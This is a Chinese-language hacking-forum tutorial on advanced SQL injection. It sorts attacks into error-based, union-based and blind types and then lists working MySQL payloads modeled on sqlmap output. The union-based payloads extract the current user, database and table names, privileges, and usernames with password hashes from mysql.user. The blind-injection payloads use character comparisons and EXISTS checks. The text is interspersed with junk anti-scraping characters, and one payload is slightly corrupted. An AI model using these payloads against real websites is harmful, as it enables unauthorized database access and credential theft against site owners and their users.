放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。$ r$ L t) G ^0 J$ O! F
/ K+ M4 @. |" g- j- `这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表9 ^0 ^. x) [8 n1 m; E) Y- }, O$ a
6 V; _& r; n; i7 h. B0 y6 K9 p分类标准 分类 备注
- S) N+ e+ n% O/ T. | j4 L按字段类型 整型注入,字符型注入 9 l4 c1 T2 }! V @, o
按出现的位置 get注入,post注入,cookie注入,http header注入
2 i9 v p% _- K) ?9 y/ g/ W" P然而高级注入是这样的2 K8 a5 \; b% ~, |& h9 G
' z5 s* G8 i' ]- n- [1 c& r高级注入分类 条件: N. v. z$ z/ r
error-based sql 数据库的错误回显可以返回,存在数据库,表结构4 s$ c3 i9 }5 p3 ]# C/ h# Y3 f
union-based sql 能够使用union,存在数据库,表结构
0 D. @8 ?1 y: }1 S: x3 [7 q) `blind sql 存在注入3 Y0 ^: [5 L) ~2 C E
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
' X* E8 z, ~) ^$ e. [9 b % m- y F; A+ d' {# ~8 C
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火# C6 c6 Q4 \, v5 ]4 E4 e
D; y% X8 T8 Q% L. L: ]附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。4 B/ h% l" |6 y8 D% s
1 V$ f# d9 s y3 e' C1 [5 M这里用mysql说明
# E" L5 h" D, @& [
, ^) g& e' p) p5 le注入坛子里很多了,请看戳我或者再戳我
# ^* b8 D% n, c6 D! M
2 u. ]8 V. [' I& U2 Gu注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的2 E5 }5 z9 r6 h' O
- _3 X" E$ z: u- @, j4 {8 O
获取当前数据库用户名
; T) d* Z( C, M" t% |
4 B3 b+ h- | b1 S9 oUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
, u- r8 X3 N% xAST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
0 |" h! J5 \8 c' aL, NULL#) F+ N u5 k5 D3 b% x5 U' h: B/ i
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
/ m# E, {; B' A# j4 h
- f6 X C. \& @% K# X/ f8 ]' f0 W获取数据库名
- ?( l$ V/ r& l) ] `: D$ K 0 [2 o6 n& f' R4 O
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
1 q2 B. \6 u: a# } E( h$ F获取所有用户名
! C7 M& y7 G9 f5 T9 p+ ]$ t% L" w% l " u# `# y2 w2 G% w1 L, X$ u
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES## T& O: `0 Y N8 r- N) R
查看当前用户权限, B+ O) Z1 ^- O
7 y' y1 P: R& O9 Q, |5 gUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#- V! U& v) _1 Z# O
尝试获取密码,当然需要有能读mysql数据库的权限
7 C0 v4 D% F- Y* D9 i! q
" F6 O F4 {6 c& S" XUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#& u4 \$ c: w6 l% S
获取表名,limit什么的自己搞啦
; R1 C# p7 } z* ]$ i' g
, r8 r3 k: z' NUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
( z u5 U& Q' R7 z获取字段名及其类型 ]5 Z; I |! ]# P* ~2 b' k' b$ P
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
" Z/ Z( ?. _) b6 [0 q0 c1 X
. j q5 w$ W ?' }- Ub注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
% p2 P: f0 {* N0 n/ f5 N3 E& V ; O1 d' u' `) p
如:) q% I! @6 d3 I- X3 S. W, y
获取当前用户名7 |' }& X7 a, O8 w% L
9 M4 J' t5 i( Y' \1 Z
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
. Y, s9 @2 m+ J" G6 `获取当前数据库2 h, }( ?* _6 ~
$ b4 r" |! H' U/ @# c
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
: W) t9 a' ?, R获取表名
, n, N/ j; b7 k( y( B' H% J
: S( j V+ Z! r: n& s6 V. }2 SAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
: y8 t7 b9 M; e4 s获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
4 u2 e. U4 y5 c" |& l% o5 f" x% B回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。( y: ~' }9 s: G' @- V
爆表
2 P" u) F P/ s6 h; o
: [ Y: m7 e' X6 J! XAND EXISTS(select * from table)
4 m2 c; ]8 I, E8 r( d) g爆字段& Y) K/ d) r% e7 A
4 P* l0 I; m/ B y& Y0 ]AND EXISTS(select pwd from table)
5 @) b7 A) ?9 ^, l8 ?- C Z盲注的变化就比较多了,由于篇幅,只是举个例子而已。
& Q7 ]( @1 M5 M/ u) Y9 E5 ^
' [4 [' B7 }3 X! I2 D4 h/ Z: b本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。5 F; j3 c2 M% q8 c7 F
|